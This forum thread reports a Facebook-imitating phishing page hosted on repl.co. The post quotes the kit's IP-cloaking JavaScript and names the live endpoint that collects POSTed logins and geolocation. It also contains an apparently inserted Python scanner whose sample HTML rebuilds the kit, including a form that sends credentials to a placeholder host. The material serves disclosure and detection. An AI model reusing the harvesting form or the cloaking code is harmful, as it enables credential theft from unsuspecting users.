repl's Being Abused for Phishing
RavinduL (15)

I received the following repl.co link over Facebook, which leads to a phishing page that resembles Facebook.

https://colorfullightcyantask.dd315b4f10v.repl.co/#0.42331671848072316

IMHO, repl.it badly needs a feature to report these!

Peeking at the code,

  • They've banned a bunch of IPs from that page, redirecting them to a song "Hawái" by "Maluma"...

    var bannedips = ["73.144.32.114", "99.38.175.146", "172.58.121.35", "68.58.189.0", "72.168.128.90", "68.36.174.182", "172.58.121.225", "24.99.251.90", "278.0.0.48.102", "11.11.11.11"]
    var ip = '<!--#echo var="REMOTE_ADDR"-->'
    var handleips=bannedips.join("|")
    handleips=new RegExp(handleips, "i")
    if (ip.search(handleips)!=-1){ 
    alert("Your IP has been banned from this site. Redirecting...")
    window.location.replace("https://www.youtube.com/watch?v=pK060iUFWXg")
    }

    ...no idea why. They seem to belong to a bunch of US ISPs.

  • The page loads a script from https://jordan--001.tk/jp/?api=1&lan=facebooknew&ht=1&counter0=jeansaldo01
  • When you click "log in", it POSTs the values of the form, along with a bunch of geographical data retrieved via GeoJS, to https://jordan--001.tk/jp/save.php?api=1&lan=facebooknew&ht=1&counter0=jeansaldo01.
  • They also grab an image from https://whos.amung.us/widget/jeansaldo01. whos.amung.us looks like a website traffic analytics tool.

Report them: https://www.enom.com/help/abusepolicy.aspx and [email protected].
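An added triage script (not code from the post, from repl.it, or from the kit) that checks a fetched page for the traits listed above: the SSI REMOTE_ADDR leak, the IP banlist used for cloaking, the form that POSTs off-site, the whos.amung.us counter, and Facebook branding served from a non-Facebook host. The HTML sample and every hostname in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample page reproducing the traits described in the post.
# Hostnames are placeholders, not the kit's real infrastructure.
SAMPLE_HTML = """<html><head><title>Facebook - log in or sign up</title>
<script src="https://tracker.example.invalid/jp/?api=1&lan=facebooknew"></script>
<script>
var bannedips = ["203.0.113.5", "198.51.100.7", "192.0.2.9"]
var ip = '<!--#echo var="REMOTE_ADDR"-->'
if (ip.search(new RegExp(bannedips.join("|"), "i")) != -1) {
  window.location.replace("https://www.youtube.com/watch?v=PLACEHOLDER")
}
</script></head><body>
<form method="POST" action="https://tracker.example.invalid/jp/save.php?api=1">
<input name="email"><input name="pass" type="password"></form>
<img src="https://whos.amung.us/widget/placeholder">
</body></html>"""

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
DOTTED_QUAD = r'"\d{1,3}(?:\.\d{1,3}){3}"'

def external_hosts(html, page_host):
    """Hosts referenced by the page that differ from the host serving it."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(html)}
    return sorted(h for h in hosts if h and h != page_host)

def scan(html, page_host):
    """Return the kit traits present in `html` as named findings."""
    findings = {}
    if re.search(r'<!--#echo\s+var="REMOTE_ADDR"\s*-->', html, re.I):
        findings["ssi_leaks_visitor_ip"] = True   # SSI inlines the visitor IP into JS
    if re.search(r'\[\s*' + DOTTED_QUAD + r'(?:\s*,\s*' + DOTTED_QUAD + r'){2,}', html):
        findings["ip_banlist"] = True             # array of 3+ IP strings: cloaking list
    m = re.search(r'<form[^>]+action="([^"]+)"', html, re.I)
    if m and urlparse(m.group(1)).hostname not in (None, page_host):
        findings["form_posts_offsite"] = urlparse(m.group(1)).hostname
    if "whos.amung.us" in html:
        findings["traffic_counter"] = "whos.amung.us"
    if "facebook" in html.lower() and not page_host.endswith("facebook.com"):
        findings["brand_impersonation"] = "facebook"
    return findings

if __name__ == "__main__":
    for name, value in scan(SAMPLE_HTML, "app.example.invalid").items():
        print(f"{name}: {value}")
    print("external hosts:", external_hosts(SAMPLE_HTML, "app.example.invalid"))
```

Feed it the raw HTML of a reported repl.co page together with that page's hostname; the off-site form target and the external hosts are what you would include in an abuse report.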

Comments
SixBeeps (3023)

Looks like the user has a few different Repls for this: https://repl.it/@dd315b4f10v

Honestly I'd contact Repl.it directly for this rn. I've heard that a Report User functionality is in the works, so problems like these can be more easily resolved.

RavinduL (15)

@SixBeeps nice find! Out of curiosity, how did you map the repl to the user? 😅

SixBeeps (3023)

@RavinduL The format for Repl.it sites is ReplName.Username.repl.co. In the link you gave, colorfullightcyantask is the name of the Repl, dd315b4f10v is the user.

JosephSanthosh (1183)

There should be a way to track down the IP Address of this user. @SixBeeps

PieroMaddaleni (1)

@SixBeeps Generally to ban such users from accessing our platform and to see if they have any other accounts from said address. Also, I've passed this on to the rest of the team, so within an hour or two something should happen.

SixBeeps (3023)

@PieroMaddaleni Yeah, but they could very well be using a VPN, which would eliminate the entire purpose of an IP ban.

AmazingMech2418 (909)

Seems like the person is banned...

AmazingMech2418 (909)

@AmazingMech2418 Also, their only remaining repl:

ridark (87)

@RavinduL When I go to https://clubhouseguard.com/ now, it brings me to google.com. Is this a remake of it too, or is it the real one? Because some users can find a domain that is exactly the same as another.

Battledash2 (1)

Cool they're banned xD

HahaYes (1213)

Oh wow, that's bad.

PattanAhmed (1103)

Where do you find his Repl?
I mean this guy:
https://repl.it/@dd315b4f10v